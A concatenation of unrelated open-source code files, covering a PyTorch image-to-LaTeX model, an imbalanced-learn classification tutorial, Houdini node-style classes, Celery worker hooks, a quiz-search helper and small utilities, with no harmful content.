            # Subject is "<name> || <email>"; recipients come from settings.
            send_mail(str(name)+' || '+str(email),message,settings.EMAIL_HOST_USER, settings.EMAIL_RECEIVING_USER, fail_silently = False)
            return render(request, 'vehicle/contactussuccess.html')
    return render(request, 'vehicle/contactus.html', {'form':sub})
|
model/img2seq_torch.py | marcoleewow/LaTeX_OCR | 290 | 10707 | <gh_stars>100-1000
import time
import sys
import os
import numpy as np
import torch
import torch.nn as nn
import torchvision.models as models
from torch.nn.utils.rnn import pack_padded_sequence
from model.base_torch import BaseModel
from model.utils.general import init_dir, get_logger
from model.utils.general import Progbar
from model.utils.general import Config
from model.utils.general import minibatches
from model.components.SimpleCNN import SimpleCNN
from model.components.ResNet import ResNet9
from model.components.DenseNet import DenseNet169
from model.components.seq2seq_torch import EncoderCNN, DecoderWithAttention, Img2Seq
from model.evaluation.text import score_files, truncate_end, write_answers
from model.utils.image import pad_batch_images_2
from model.utils.text import pad_batch_formulas
from torch.utils.data import Dataset
import h5py
import json
from model.utils.data_generator import DataGenerator
class ImgFormulaDataset(Dataset):
    """PyTorch Dataset wrapping a DataGenerator of (image, formula) pairs
    so it can feed a torch DataLoader.
    """

    def __init__(self, data_generator: DataGenerator, transform=None):
        """
        :param data_generator: source of (image, formula) pairs
        :param transform: image transform pipeline (currently unused by
            __getitem__)
        """
        self.data_generator = data_generator
        # PyTorch transformation pipeline for the image (normalizing, etc.)
        self.transform = transform

    def __getitem__(self, i):
        """Return the i-th (padded image, formula) pair.

        The single image is padded onto a fixed 800x800x1 canvas so that
        items of different sizes can be stacked into batches.
        """
        (img, formula) = self.data_generator.__getitem__(i)
        img = pad_batch_images_2([img], [800, 800, 1])
        return img, formula

    def __len__(self):
        return len(self.data_generator)
class Img2SeqModel(BaseModel):
def __init__(self, config, dir_output, vocab):
super(Img2SeqModel, self).__init__(config, dir_output)
self._vocab = vocab
def getModel(self, model_name="CNN"):
if model_name == "CNN":
return SimpleCNN()
elif model_name == "ResNet9":
return ResNet9()
elif model_name == "DenseNet169":
return DenseNet169(pretrained=True)
elif model_name == "Img2Seq":
self.encoder = EncoderCNN(self._config)
self.decoder = DecoderWithAttention(attention_dim=512,
embed_dim=512,
decoder_dim=512,
vocab_size=self._vocab.n_tok,
dropout=0.5)
return Img2Seq(self._config, self._vocab)
def getOptimizer(self, lr_method='adam', lr=0.001):
self.encoder_optimizer = torch.optim.Adam(params=self.encoder.parameters(), lr=lr)
self.decoder_optimizer = torch.optim.Adam(params=self.decoder.parameters(), lr=lr)
return super().getOptimizer(lr_method=lr_method, lr=lr)
def _run_train_epoch(self, config, train_set, val_set, epoch, lr_schedule):
"""Performs an epoch of training
Args:
config: Config instance
train_set: Dataset instance
val_set: Dataset instance
epoch: (int) id of the epoch, starting at 0
lr_schedule: LRSchedule instance that takes care of learning proc
Returns:
score: (float) model will select weights that achieve the highest score
"""
# logging
batch_size = config.batch_size
nbatches = (len(train_set) + batch_size - 1) // batch_size
prog = Progbar(nbatches)
self.model.train()
self.encoder.train()
self.decoder.train()
train_loader = torch.utils.data.DataLoader(ImgFormulaDataset(train_set),
batch_size=batch_size,
shuffle=True, num_workers=3, pin_memory=True)
# for i, (img, formula) in enumerate(train_loader):
for i, (img, formula) in enumerate(minibatches(train_set, batch_size)):
img = pad_batch_images_2(img)
img = torch.FloatTensor(img) # (N, W, H, C)
formula, formula_length = pad_batch_formulas(formula, self._vocab.id_pad, self._vocab.id_end)
img = img.permute(0, 3, 1, 2) # (N, C, W, H)
formula = torch.LongTensor(formula) # (N,)
loss_eval = self.getLoss(img, formula=formula, lr=lr_schedule.lr, dropout=config.dropout, training=True)
prog.update(i + 1, [("loss", loss_eval), ("lr", lr_schedule.lr)])
# update learning rate
lr_schedule.update(batch_no=epoch*nbatches + i)
self.logger.info("- Training: {}".format(prog.info))
# evaluation
config_eval = Config({"dir_answers": self._dir_output + "formulas_val/", "batch_size": config.batch_size})
scores = self.evaluate(config_eval, val_set)
score = scores["perplexity"]
lr_schedule.update(score=score)
return score
def getLoss(self, img, formula, lr, dropout, training=True):
# Move to GPU, if available
img = img.to(self.device)
formula = formula.to(self.device)
# Forward prop.
imgs = self.encoder(img)
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(
imgs, formula, torch.LongTensor([[len(i)] for i in formula]))
# Since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# Remove timesteps that we didn't decode at, or are pads
# pack_padded_sequence is an easy trick to do this
scores, _ = pack_padded_sequence(scores, decode_lengths, batch_first=True)
targets, _ = pack_padded_sequence(targets, decode_lengths, batch_first=True)
# Calculate loss
loss = self.criterion(scores, targets)
alpha_c = 1.
# Add doubly stochastic attention regularization
loss += alpha_c * ((1. - alphas.sum(dim=1)) ** 2).mean()
# Back prop.
self.decoder_optimizer.zero_grad()
if self.encoder_optimizer is not None:
self.encoder_optimizer.zero_grad()
loss.backward()
# Update weights
self.decoder_optimizer.step()
if self.encoder_optimizer is not None:
self.encoder_optimizer.step()
return -loss.item()
def _run_evaluate_epoch(self, config, test_set):
"""Performs an epoch of evaluation
Args:
test_set: Dataset instance
params: (dict) with extra params in it
- "dir_name": (string)
Returns:
scores: (dict) scores["acc"] = 0.85 for instance
"""
self.model.eval()
self.encoder.eval()
self.decoder.eval()
# initialize containers of references and predictions
if self._config.decoding == "greedy":
refs, hyps = [], [[]]
elif self._config.decoding == "beam_search":
refs, hyps = [], [[] for i in range(self._config.beam_size)]
references = list() # references (true captions) for calculating BLEU-4 score
hypotheses = list() # hypotheses (predictions)
with torch.no_grad():
nbatches = len(test_set)
prog = Progbar(nbatches)
test_loader = torch.utils.data.DataLoader(ImgFormulaDataset(test_set),
batch_size=nbatches,
shuffle=True, num_workers=3, pin_memory=True)
for i, (img, formula) in enumerate(minibatches(test_set, nbatches)):
# print(type(img), len(img), img[0].shape)
# print(type(formula), formula)
# Move to GPU, if available
img = pad_batch_images_2(img)
img = torch.FloatTensor(img) # (N, W, H, C)
formula, formula_length = pad_batch_formulas(formula, self._vocab.id_pad, self._vocab.id_end)
img = img.permute(0, 3, 1, 2) # (N, C, W, H)
formula = torch.LongTensor(formula) # (N,)
img = img.to(self.device)
formula = formula.to(self.device)
# Forward prop.
imgs = self.encoder(img)
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, formula, torch.LongTensor([[len(i)] for i in formula]))
# Since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# Remove timesteps that we didn't decode at, or are pads
# pack_padded_sequence is an easy trick to do this
scores, _ = pack_padded_sequence(scores, decode_lengths, batch_first=True)
targets, _ = pack_padded_sequence(targets, decode_lengths, batch_first=True)
# Calculate loss
loss = self.criterion(scores, targets)
print(scores.shape, targets.shape)
print(loss)
alpha_c = 1.
# Add doubly stochastic attention regularization
loss += alpha_c * ((1. - alphas.sum(dim=1)) ** 2).mean()
loss_eval = loss.item()
prog.update(i + 1, [("loss", loss_eval), ("perplexity", np.exp(loss_eval))])
# Store references (true captions), and hypothesis (prediction) for each image
# If for n images, we have n hypotheses, and references a, b, c... for each image, we need -
# references = [[ref1a, ref1b, ref1c], [ref2a, ref2b], ...], hypotheses = [hyp1, hyp2, ...]
# print("---------------------------------------------------------------formula and prediction :")
for form, preds in zip(formula, scores):
refs.append(form)
# print(form, " ---------- ", preds[0])
for i, pred in enumerate(preds):
hyps[i].append(pred)
files = write_answers(refs, hyps, self._vocab.id_to_tok, config.dir_answers, self._vocab.id_end)
scores = score_files(files[0], files[1])
# perp = - np.exp(ce_words / float(n_words))
# scores["perplexity"] = perp
self.logger.info("- Evaluating: {}".format(prog.info))
return {
"perplexity": loss.item()
}
def predict_batch(self, images):
    """Run the model on a batch of images and return per-image class-1 scores.

    :param images: batched input; must support ``.to(device)`` (i.e. a tensor,
        not a plain list) -- see NOTE in :meth:`predict`.
    :return: list of raw class-1 output activations, one per image.
    """
    preds = []
    images = images.to(self.device)
    outputs = self.model(images)
    # Argmax over classes is computed but never used below.
    _, predicted = torch.max(outputs.data, 1)
    # NOTE(review): returns the raw class-1 activations rather than the
    # predicted labels -- confirm callers expect scores, not argmax labels.
    pr = outputs[:, 1].detach().cpu().numpy()
    for i in pr:
        preds.append(i)
    return preds
def predict(self, img):
    """Predict for a single image by delegating to :meth:`predict_batch`.

    NOTE(review): this wraps ``img`` in a plain Python list, but
    ``predict_batch`` calls ``.to(self.device)`` on its argument, which a
    list does not support -- this looks like it would raise at runtime.
    Confirm whether callers are expected to pass a batched tensor instead.
    """
    return self.predict_batch([img])
|
icons.py | jasantunes/alfred-golinks | 312 | 10730 | <gh_stars>100-1000
# encoding: utf-8
#
# Copyright (c) 2019 <NAME> <<EMAIL>>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2019-09-06
#
"""Overlay check mark on icons."""
from __future__ import print_function, absolute_import
from Cocoa import (
NSBitmapImageRep,
NSPNGFileType,
NSImage,
NSMakeSize,
NSCompositeCopy,
NSSizeToCGSize,
NSZeroPoint,
)
from CoreGraphics import CGRectZero
def overlay(src, overlay, dest):
    """Create image ``dest`` by compositing ``overlay`` on top of ``src``.

    Args:
        src (str): Path to the base image.
        overlay (str): Path to the image drawn on top.
        dest (str): Path the combined PNG is written to.

    """
    # Note: the ``overlay`` parameter shadows this function's own name;
    # kept as-is because renaming it would break keyword-argument callers.
    base_img = NSImage.alloc().initWithContentsOfFile_(src)
    top_img = NSImage.alloc().initWithContentsOfFile_(overlay)

    combined = NSImage.alloc().initWithSize_(base_img.size())
    combined.lockFocus()

    frame = (0, 0), base_img.size()
    base_img.drawInRect_(frame)
    top_img.drawInRect_(frame)

    combined.unlockFocus()

    # Convert the in-memory image to PNG bytes and write them out.
    rep = NSBitmapImageRep.imageRepWithData_(combined.TIFFRepresentation())
    png_data = rep.representationUsingType_properties_(NSPNGFileType, {})
    png_data.writeToFile_atomically_(dest, False)
|
examples/applications/plot_impact_imbalanced_classes.py | cdchushig/imbalanced-learn | 5,678 | 10769 | """
==========================================================
Fitting model on imbalanced datasets and how to fight bias
==========================================================
This example illustrates the problem induced by learning on datasets having
imbalanced classes. Subsequently, we compare different approaches alleviating
these negative effects.
"""
# Authors: <NAME> <<EMAIL>>
# License: MIT
# %%
print(__doc__)

# %% [markdown]
# Problem definition
# ------------------
#
# We are dropping the following features:
#
# - "fnlwgt": this feature was created while studying the "adult" dataset.
#   Thus, we will not use this feature which is not acquired during the survey.
# - "education-num": it encodes the same information as "education".
#   Thus, we remove one of these 2 features.

# %%
from sklearn.datasets import fetch_openml

df, y = fetch_openml("adult", version=2, as_frame=True, return_X_y=True)
df = df.drop(columns=["fnlwgt", "education-num"])

# %% [markdown]
# The "adult" dataset has a class ratio of about 3:1

# %%
classes_count = y.value_counts()
classes_count

# %% [markdown]
# This dataset is only slightly imbalanced. To better highlight the effect of
# learning from an imbalanced dataset, we will increase its ratio to 30:1

# %%
from imblearn.datasets import make_imbalance

ratio = 30
df_res, y_res = make_imbalance(
    df,
    y,
    sampling_strategy={classes_count.idxmin(): classes_count.max() // ratio},
)
y_res.value_counts()
# %% [markdown]
# We will perform a cross-validation evaluation to get an estimate of the test
# score.
#
# As a baseline, we could use a classifier which will always predict the
# majority class independently of the features provided.

# %%
from sklearn.model_selection import cross_validate
from sklearn.dummy import DummyClassifier

dummy_clf = DummyClassifier(strategy="most_frequent")
scoring = ["accuracy", "balanced_accuracy"]
cv_result = cross_validate(dummy_clf, df_res, y_res, scoring=scoring)
print(f"Accuracy score of a dummy classifier: {cv_result['test_accuracy'].mean():.3f}")

# %% [markdown]
# Instead of using the accuracy, we can use the balanced accuracy which will
# take into account the balancing issue.

# %%
print(
    f"Balanced accuracy score of a dummy classifier: "
    f"{cv_result['test_balanced_accuracy'].mean():.3f}"
)

# %% [markdown]
# Strategies to learn from an imbalanced dataset
# ----------------------------------------------
# We will use a dictionary and a list to continuously store the results of
# our experiments and show them as a pandas dataframe.

# %%
index = []
scores = {"Accuracy": [], "Balanced accuracy": []}

# %% [markdown]
# Dummy baseline
# ..............
#
# Before training a real machine learning model, we can store the results
# obtained with our :class:`~sklearn.dummy.DummyClassifier`.

# %%
import pandas as pd

index += ["Dummy classifier"]
cv_result = cross_validate(dummy_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# Linear classifier baseline
# ..........................
#
# We will create a machine learning pipeline using a
# :class:`~sklearn.linear_model.LogisticRegression` classifier. In this regard,
# we will need to one-hot encode the categorical columns and standardize the
# numerical columns before injecting the data into the
# :class:`~sklearn.linear_model.LogisticRegression` classifier.
#
# First, we define our numerical and categorical pipelines.

# %%
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import OneHotEncoder
from sklearn.pipeline import make_pipeline

num_pipe = make_pipeline(
    StandardScaler(), SimpleImputer(strategy="mean", add_indicator=True)
)
cat_pipe = make_pipeline(
    SimpleImputer(strategy="constant", fill_value="missing"),
    OneHotEncoder(handle_unknown="ignore"),
)

# %% [markdown]
# Then, we can create a preprocessor which will dispatch the categorical
# columns to the categorical pipeline and the numerical columns to the
# numerical pipeline

# %%
from sklearn.compose import make_column_transformer
from sklearn.compose import make_column_selector as selector

preprocessor_linear = make_column_transformer(
    (num_pipe, selector(dtype_include="number")),
    (cat_pipe, selector(dtype_include="category")),
    n_jobs=2,
)

# %% [markdown]
# Finally, we connect our preprocessor with our
# :class:`~sklearn.linear_model.LogisticRegression`. We can then evaluate our
# model.

# %%
from sklearn.linear_model import LogisticRegression

lr_clf = make_pipeline(preprocessor_linear, LogisticRegression(max_iter=1000))

# %%
index += ["Logistic regression"]
cv_result = cross_validate(lr_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# We can see that our linear model is learning slightly better than our dummy
# baseline. However, it is impacted by the class imbalance.
#
# We can verify that something similar is happening with a tree-based model
# such as :class:`~sklearn.ensemble.RandomForestClassifier`. With this type of
# classifier, we will not need to scale the numerical data, and we will only
# need to ordinal encode the categorical data.

# %%
from sklearn.preprocessing import OrdinalEncoder
from sklearn.ensemble import RandomForestClassifier

num_pipe = SimpleImputer(strategy="mean", add_indicator=True)
cat_pipe = make_pipeline(
    SimpleImputer(strategy="constant", fill_value="missing"),
    OrdinalEncoder(handle_unknown="use_encoded_value", unknown_value=-1),
)

preprocessor_tree = make_column_transformer(
    (num_pipe, selector(dtype_include="number")),
    (cat_pipe, selector(dtype_include="category")),
    n_jobs=2,
)

rf_clf = make_pipeline(
    preprocessor_tree, RandomForestClassifier(random_state=42, n_jobs=2)
)

# %%
index += ["Random forest"]
cv_result = cross_validate(rf_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores

# %% [markdown]
# The :class:`~sklearn.ensemble.RandomForestClassifier` is also affected by
# the class imbalance, slightly less than the linear model. Now, we will
# present different approaches to improve the performance of these 2 models.
#
# Use `class_weight`
# ..................
#
# Most of the models in `scikit-learn` have a parameter `class_weight`. This
# parameter will affect the computation of the loss in linear models or the
# criterion in tree-based models to penalize differently a false
# classification of the minority and the majority class. We can set
# `class_weight="balanced"` such that the weight applied is inversely
# proportional to the class frequency. We test this parametrization in both
# the linear model and the tree-based model.

# %%
lr_clf.set_params(logisticregression__class_weight="balanced")

index += ["Logistic regression with balanced class weights"]
cv_result = cross_validate(lr_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores

# %%
rf_clf.set_params(randomforestclassifier__class_weight="balanced")

index += ["Random forest with balanced class weights"]
cv_result = cross_validate(rf_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# We can see that using `class_weight` was really effective for the linear
# model, alleviating the issue of learning from imbalanced classes. However,
# the :class:`~sklearn.ensemble.RandomForestClassifier` is still biased toward
# the majority class, mainly due to the criterion which is not suited enough to
# fight the class imbalance.
#
# Resample the training set during learning
# .........................................
#
# Another way is to resample the training set by under-sampling or
# over-sampling some of the samples. `imbalanced-learn` provides some samplers
# to do such processing.

# %%
from imblearn.pipeline import make_pipeline as make_pipeline_with_sampler
from imblearn.under_sampling import RandomUnderSampler

lr_clf = make_pipeline_with_sampler(
    preprocessor_linear,
    RandomUnderSampler(random_state=42),
    LogisticRegression(max_iter=1000),
)

# %%
index += ["Under-sampling + Logistic regression"]
cv_result = cross_validate(lr_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores

# %%
rf_clf = make_pipeline_with_sampler(
    preprocessor_tree,
    RandomUnderSampler(random_state=42),
    RandomForestClassifier(random_state=42, n_jobs=2),
)

# %%
index += ["Under-sampling + Random forest"]
cv_result = cross_validate(rf_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores

# %% [markdown]
# Applying a random under-sampler before training the linear model or the
# random forest allows the model not to focus on the majority class, at the
# cost of making more mistakes for samples in the majority class (i.e.
# decreased accuracy).
#
# We could apply any type of sampler and find which sampler is working best
# on the current dataset.
#
# Instead, we will present another way by using classifiers which will apply
# sampling internally.
#
# Use of specific balanced algorithms from imbalanced-learn
# .........................................................
#
# We already showed that random under-sampling can be effective on decision
# trees. However, instead of under-sampling the dataset once, one could
# under-sample the original dataset before taking each bootstrap sample. This
# is the basis of the
# :class:`imblearn.ensemble.BalancedRandomForestClassifier` and
# :class:`~imblearn.ensemble.BalancedBaggingClassifier`.

# %%
from imblearn.ensemble import BalancedRandomForestClassifier

rf_clf = make_pipeline(
    preprocessor_tree,
    BalancedRandomForestClassifier(random_state=42, n_jobs=2),
)

# %%
index += ["Balanced random forest"]
cv_result = cross_validate(rf_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# The performance with the
# :class:`~imblearn.ensemble.BalancedRandomForestClassifier` is better than
# applying a single random under-sampling. We will use a gradient-boosting
# classifier within a :class:`~imblearn.ensemble.BalancedBaggingClassifier`.

from sklearn.experimental import enable_hist_gradient_boosting  # noqa
from sklearn.ensemble import HistGradientBoostingClassifier
from imblearn.ensemble import BalancedBaggingClassifier

bag_clf = make_pipeline(
    preprocessor_tree,
    BalancedBaggingClassifier(
        base_estimator=HistGradientBoostingClassifier(random_state=42),
        n_estimators=10,
        random_state=42,
        n_jobs=2,
    ),
)

index += ["Balanced bag of histogram gradient boosting"]
cv_result = cross_validate(bag_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores

# %% [markdown]
# This last approach is the most effective. The different under-samplings
# bring some diversity for the different GBDTs to learn from, instead of all
# of them focusing on a portion of the majority class.
|
# This sample tests the checker's ability to enforce
# type invariance for type arguments.

# pyright: strict

from typing import Dict, Union

foo: Dict[Union[int, str], str] = {}
bar: Dict[str, str] = {}

# This should generate an error: both type parameters of Dict are invariant,
# so Dict[str, str] is not assignable to Dict[Union[int, str], str] even
# though str itself is assignable to Union[int, str].
foo = bar
|
native_prophet.py | 1143048123/cddh | 177 | 10803 | <gh_stars>100-1000
# coding: utf-8
# quote from kmaiya/HQAutomator
# 谷歌搜索部分原版搬运,未做修改
import time
import json
import requests
import webbrowser
questions = []
def get_answer():
    """Poll the quiz endpoint and open a Baidu search for any new question.

    Returns a status string when there is no question or no new question;
    returns None after opening a browser search for a new question.
    """
    resp = requests.get('http://htpmsg.jiecaojingxuan.com/msg/current', timeout=4).text
    resp_dict = json.loads(resp)
    if resp_dict['msg'] == 'no data':
        return 'Waiting for question...'
    # BUG FIX: the payload was previously re-parsed with eval(str(resp)),
    # which is redundant (json.loads already parsed it) and unsafe on
    # remote data; reuse the parsed dict instead.
    question = resp_dict['data']['event']['desc']
    # Strip the leading question number (everything up to the first '.')
    # and the trailing question mark.
    question = question[question.find('.') + 1:question.find('?')]
    if question not in questions:
        questions.append(question)
        webbrowser.open("https://www.baidu.com/s?ie=UTF-8&wd=" + question)
    else:
        return 'Waiting for new question...'
def main():
    """Poll once per second, printing a timestamp and the current status."""
    while True:
        print(time.strftime('%H:%M:%S',time.localtime(time.time())))
        # NOTE(review): get_answer() returns None right after opening a
        # browser search, so this prints "None" in that case.
        print(get_answer())
        time.sleep(1)

if __name__ == '__main__':
    main()
|
python/ht/nodes/styles/styles.py | Hengle/Houdini-Toolbox | 136 | 10804 | """Classes representing color entries and mappings."""
# =============================================================================
# IMPORTS
# =============================================================================
from __future__ import annotations
# Standard Library
import re
from typing import TYPE_CHECKING, Optional, Tuple
if TYPE_CHECKING:
import hou
# =============================================================================
# CLASSES
# =============================================================================
class StyleConstant:
    """This class represents a named constant style.

    :param name: The constant's name.
    :param color: The constant's color.
    :param color_type: The color type.
    :param shape: The constant's shape.
    :param file_path: The path to the definition file.
    :return:

    """

    def __init__(
        self,
        name: str,
        color: hou.Color,
        color_type: str,
        shape: Optional[str] = None,
        file_path: Optional[str] = None,
    ):
        self._color = color
        self._color_type = color_type
        self._shape = shape
        self._file_path = file_path
        self._name = name

    # -------------------------------------------------------------------------
    # SPECIAL METHODS
    # -------------------------------------------------------------------------

    def __eq__(self, other):
        if not isinstance(other, StyleConstant):
            return NotImplemented

        # For our purposes we only care if the names match.
        return self.name == other.name

    def __hash__(self):
        # Hash on the name only, consistent with __eq__.
        return hash(self.name)

    def __ne__(self, other):
        if not isinstance(other, StyleConstant):
            return NotImplemented

        return not self.__eq__(other)

    def __repr__(self):
        return "<StyleConstant {} ({})>".format(self.name, self.color)

    # -------------------------------------------------------------------------
    # PROPERTIES
    # -------------------------------------------------------------------------

    @property
    def color(self) -> hou.Color:
        """The mapped color."""
        return self._color

    # -------------------------------------------------------------------------

    @property
    def color_type(self) -> str:
        """The mapped color type."""
        return self._color_type

    # -------------------------------------------------------------------------

    @property
    def file_path(self) -> Optional[str]:
        """Path the definition was from."""
        return self._file_path

    # -------------------------------------------------------------------------

    @property
    def name(self) -> str:
        """The name the color is mapped to."""
        return self._name

    # -------------------------------------------------------------------------

    @property
    def shape(self) -> Optional[str]:
        """The mapped shape."""
        return self._shape

    # -------------------------------------------------------------------------
    # METHODS
    # -------------------------------------------------------------------------

    def apply_to_node(self, node: hou.Node):
        """Apply styling to a node.

        Sets the node's color and, when defined, its "nodeshape" user data.

        :param node: Node to apply to
        :return:

        """
        if self.color is not None:
            node.setColor(self.color)

        if self.shape is not None:
            node.setUserData("nodeshape", self.shape)
class StyleRule:
    """This class represents a color application bound to a name.

    :param name: The rule's name.
    :param color: The rule's color.
    :param color_type: The rule's color type.
    :param shape: The rule's shape.
    :param file_path: The path to the definition file.
    :return:

    """

    def __init__(
        self,
        name: str,
        color: hou.Color,
        color_type: str,
        shape: Optional[str] = None,
        file_path: Optional[str] = None,
    ):
        self._color = color
        self._color_type = color_type
        self._shape = shape
        self._file_path = file_path
        self._name = name

    # -------------------------------------------------------------------------
    # SPECIAL METHODS
    # -------------------------------------------------------------------------

    def __eq__(self, other):
        if not isinstance(other, StyleRule):
            return NotImplemented

        # For our purposes we only care if the names match.
        return self.name == other.name

    def __hash__(self):
        # Hash on the name only, consistent with __eq__.
        return hash(self.name)

    def __ne__(self, other):
        if not isinstance(other, StyleRule):
            return NotImplemented

        return not self.__eq__(other)

    def __repr__(self):
        return "<StyleRule {} ({})>".format(self.name, self.color)

    def __str__(self):
        # Render the color components as "(r, g, b)" with trailing zeros
        # (and a dangling decimal point, if any) stripped.
        value = self._get_typed_color_value()
        components = [re.sub("\\.*0+$", "", "{:0.3f}".format(val)) for val in value]

        return "(" + ", ".join(components) + ")"

    # -------------------------------------------------------------------------
    # NON-PUBLIC METHODS
    # -------------------------------------------------------------------------

    def _get_typed_color_value(self) -> Tuple[float, ...]:
        """Get the appropriately typed color values.

        Looks up the hou.Color conversion method matching ``color_type``
        (e.g. ``rgb()`` for "RGB") and calls it.

        :return: The color value in the correct type.

        """
        to_func = getattr(self.color, self.color_type.lower())

        return to_func()

    # -------------------------------------------------------------------------
    # PROPERTIES
    # -------------------------------------------------------------------------

    @property
    def color(self) -> hou.Color:
        """The mapped color."""
        return self._color

    @property
    def color_type(self) -> str:
        """The mapped color type."""
        return self._color_type

    @property
    def shape(self) -> Optional[str]:
        """The mapped shape name."""
        return self._shape

    @property
    def file_path(self) -> Optional[str]:
        """Path the definition was from."""
        return self._file_path

    @property
    def name(self) -> str:
        """The name the style is mapped to."""
        return self._name

    # -------------------------------------------------------------------------
    # METHODS
    # -------------------------------------------------------------------------

    def apply_to_node(self, node: hou.Node):
        """Apply styling to a node.

        Sets the node's color and, when defined, its "nodeshape" user data.

        :param node: Node to apply to
        :return:

        """
        if self.color is not None:
            node.setColor(self.color)

        if self.shape is not None:
            node.setUserData("nodeshape", self.shape)
class ConstantRule:
    """This class represents a style application bound to a named constant.

    :param name: The rule's name.
    :param constant_name: The name of the constant this rule applies.
    :param file_path: The path to the definition file.
    :return:

    """

    def __init__(self, name: str, constant_name: str, file_path: Optional[str] = None):
        self._constant_name = constant_name
        self._file_path = file_path
        self._name = name

    # -------------------------------------------------------------------------
    # SPECIAL METHODS
    # -------------------------------------------------------------------------

    def __eq__(self, other):
        if not isinstance(other, ConstantRule):
            return NotImplemented

        # For our purposes we only care if the names match.
        return self.name == other.name

    def __hash__(self):
        # BUG FIX: __eq__ compares names only, so the hash must be derived
        # from the name alone as well (matching StyleConstant/StyleRule).
        # Previously this hashed (constant_name, name), which let two
        # "equal" rules hash differently, violating the hash contract and
        # breaking dict/set membership.
        return hash(self.name)

    def __ne__(self, other):
        if not isinstance(other, ConstantRule):
            return NotImplemented

        return not self.__eq__(other)

    def __repr__(self):
        return "<ConstantRule {} ({})>".format(self.name, self.constant_name)

    # -------------------------------------------------------------------------
    # PROPERTIES
    # -------------------------------------------------------------------------

    @property
    def constant_name(self) -> str:
        """The mapped constant."""
        return self._constant_name

    @property
    def file_path(self) -> Optional[str]:
        """Path the definition was from."""
        return self._file_path

    @property
    def name(self) -> str:
        """The name the style is mapped to."""
        return self._name
|
ichnaea/taskapp/app.py | mikiec84/ichnaea | 348 | 10841 | """
Holds global celery application state and startup / shutdown handlers.
"""
from celery import Celery
from celery.app import app_or_default
from celery.signals import (
beat_init,
worker_process_init,
worker_process_shutdown,
setup_logging,
)
from ichnaea.log import configure_logging
from ichnaea.taskapp.config import (
configure_celery,
init_beat,
init_worker,
shutdown_worker,
)
@setup_logging.connect
def setup_logging_process(loglevel, logfile, format, colorize, **kwargs):
    """Called at scheduler and worker setup.

    Configures logging using the same configuration as the webapp.
    The logging settings celery passes in are intentionally ignored;
    :func:`ichnaea.log.configure_logging` is the single source of truth.
    """
    configure_logging()


@beat_init.connect
def init_beat_process(signal, sender, **kw):
    """
    Called automatically when `celery beat` is started.

    Calls :func:`ichnaea.taskapp.config.init_beat`.
    """
    celery_app = app_or_default()
    init_beat(sender, celery_app)


@worker_process_init.connect
def init_worker_process(signal, sender, **kw):
    """
    Called automatically when `celery worker` is started. This is executed
    inside each forked worker process.

    Calls :func:`ichnaea.taskapp.config.init_worker`.
    """
    # get the app in the current worker process
    celery_app = app_or_default()
    init_worker(celery_app)


@worker_process_shutdown.connect
def shutdown_worker_process(signal, sender, **kw):
    """
    Called automatically when `celery worker` is stopped. This is executed
    inside each forked worker process.

    Calls :func:`ichnaea.taskapp.config.shutdown_worker`.
    """
    celery_app = app_or_default()
    shutdown_worker(celery_app)


# Created and configured at import time so that invocations like
# `celery -A ichnaea.taskapp.app` can find the application object.
celery_app = Celery("ichnaea.taskapp.app")

configure_celery(celery_app)
|
dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | 169 | 10865 | <filename>dev/bazel/deps/micromkl.bzl<gh_stars>100-1000
#===============================================================================
# Copyright 2020-2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
load("@onedal//dev/bazel:repos.bzl", "repos")
# Repository rule exposing the prebuilt CPU microMKL static libraries.
# The %{os} placeholder is substituted by the repository rule at fetch time.
micromkl_repo = repos.prebuilt_libs_repo_rule(
    includes = [
        "include",
        "%{os}/include",
    ],
    libs = [
        "%{os}/lib/intel64/libdaal_mkl_thread.a",
